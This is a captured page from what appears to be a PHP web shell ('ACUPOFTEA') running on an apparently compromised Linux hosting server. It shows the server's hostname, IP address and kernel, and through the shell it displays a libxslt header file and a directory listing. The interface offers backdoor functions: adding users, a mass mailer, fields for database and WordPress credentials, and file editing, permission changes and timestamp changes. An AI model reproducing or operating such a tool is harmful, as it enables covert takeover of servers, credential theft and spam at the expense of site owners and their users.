System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
libxslt
/
216.73.216.6
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
numbersInternals.h
/* * Summary: Implementation of the XSLT number functions * Description: Implementation of the XSLT number functions * * Copy: See Copyright for the status of this software. * * Author: Bjorn Reese <breese@users.sourceforge.net> and Daniel Veillard */ #ifndef __XML_XSLT_NUMBERSINTERNALS_H__ #define __XML_XSLT_NUMBERSINTERNALS_H__ #include <libxml/tree.h> #include "xsltexports.h" #ifdef __cplusplus extern "C" { #endif struct _xsltCompMatch; /** * xsltNumberData: * * This data structure is just a wrapper to pass xsl:number data in. */ typedef struct _xsltNumberData xsltNumberData; typedef xsltNumberData *xsltNumberDataPtr; struct _xsltNumberData { const xmlChar *level; const xmlChar *count; const xmlChar *from; const xmlChar *value; const xmlChar *format; int has_format; int digitsPerGroup; int groupingCharacter; int groupingCharacterLen; xmlDocPtr doc; xmlNodePtr node; struct _xsltCompMatch *countPat; struct _xsltCompMatch *fromPat; /* * accelerators */ }; /** * xsltFormatNumberInfo,: * * This data structure lists the various parameters needed to format numbers. */ typedef struct _xsltFormatNumberInfo xsltFormatNumberInfo; typedef xsltFormatNumberInfo *xsltFormatNumberInfoPtr; struct _xsltFormatNumberInfo { int integer_hash; /* Number of '#' in integer part */ int integer_digits; /* Number of '0' in integer part */ int frac_digits; /* Number of '0' in fractional part */ int frac_hash; /* Number of '#' in fractional part */ int group; /* Number of chars per display 'group' */ int multiplier; /* Scaling for percent or permille */ char add_decimal; /* Flag for whether decimal point appears in pattern */ char is_multiplier_set; /* Flag to catch multiple occurences of percent/permille */ char is_negative_pattern;/* Flag for processing -ve prefix/suffix */ }; #ifdef __cplusplus } #endif #endif /* __XML_XSLT_NUMBERSINTERNALS_H__ */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:58:31
..
DIR
-
drwxr-xr-x
2025-10-28 10:57:27
attributes.h
text/x-c
930 B
-rw-r--r--
2015-05-10 02:11:29
documents.h
text/x-c
2.64 KB
-rw-r--r--
2015-05-10 02:11:29
extensions.h
text/x-c
6.74 KB
-rw-r--r--
2012-09-04 02:26:23
extra.h
text/x-c
1.6 KB
-rw-r--r--
2017-08-29 11:20:04
functions.h
text/x-c
1.96 KB
-rw-r--r--
2015-05-10 02:11:29
imports.h
text/x-c
1.8 KB
-rw-r--r--
2015-05-10 02:11:29
keys.h
text/x-c
1.13 KB
-rw-r--r--
2015-05-10 02:11:29
namespaces.h
text/x-c
1.63 KB
-rw-r--r--
2015-05-10 02:11:30
numbersInternals.h
text/x-c
1.97 KB
-rw-r--r--
2015-05-10 02:11:30
pattern.h
text/x-c
1.95 KB
-rw-r--r--
2012-09-04 02:26:23
preproc.h
text/x-c
892 B
-rw-r--r--
2015-05-10 02:11:30
security.h
text/x-c
2.59 KB
-rw-r--r--
2015-05-10 02:11:30
templates.h
text/x-c
2.21 KB
-rw-r--r--
2015-05-10 02:11:30
transform.h
text/x-c
6.18 KB
-rw-r--r--
2015-02-27 06:00:23
variables.h
text/x-c
3.07 KB
-rw-r--r--
2025-08-26 08:55:04
xslt.h
text/x-c
1.92 KB
-rw-r--r--
2015-05-10 02:11:30
xsltInternals.h
text/x-c
56.14 KB
-rw-r--r--
2025-08-26 08:55:04
xsltconfig.h
text/x-c
3.5 KB
-rw-r--r--
2025-08-26 08:55:13
xsltexports.h
text/plain
3.35 KB
-rw-r--r--
2009-05-12 06:29:34
xsltlocale.h
text/x-c
1.51 KB
-rw-r--r--
2017-10-26 07:55:47
xsltutils.h
text/x-c
8.49 KB
-rw-r--r--
2025-08-26 08:55:04
~ ACUPOFTEA - mail.ontime-ae.com